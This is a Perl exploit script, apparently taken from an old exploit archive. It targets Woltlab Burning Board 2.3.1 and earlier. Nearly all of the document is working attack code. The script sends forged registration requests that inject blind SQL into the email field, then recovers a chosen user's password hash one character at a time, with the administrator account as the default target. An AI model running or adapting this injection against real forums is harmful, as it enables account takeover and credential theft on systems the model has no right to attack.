#!/usr/bin/perl use strict; use IO::Socket::INET; $| = print " Woltlab Burning Board <= 2.3.1 Exploit Vulnerability discovered by GulfTech Security Research Visit www.security-project.org Exploit by deluxe89 ---------- "; my $host = 'www.security-project.org'; my $path = '/wbb2/'; # path to the board my $userid = 1; # the password hash will be from the user with this id my $username = 'deluxe89'; # any username from the board my $proxy = ''; # proxy, you can leave this empty my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards # proxy handling my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80); if($proxy ne '') { print "[~] Using a proxy\n"; } else { print "[~] You're using NO proxy!\n"; sleep(1); } # # Get the hash # print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: "; my $hash = ''; for(my $i=1;$i<33;$i++) { my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server'); if(&test($i, 96)) # buchstabe { for(my $c=97;$c<103;$c++) { if(&test($i, $c, 1)) { print pack('c', $c); last; } } } else # zahl { #print "0-4\n"; for(my $c=48;$c<58;$c++) { if(&test($i, $c, 1)) { print pack('c', $c); last; } } } } print "\n"; sub test { my ($i, $num, $g) = @_; my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server'); my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))"; $value .= ($g) ? '=' : '>'; $value .= "$num)/*"; my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed"; print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n"; while(<$sock>) { if($_ =~ m/$error/) { return 1; } } return 0; } # milw0rm.com [2005-05-20]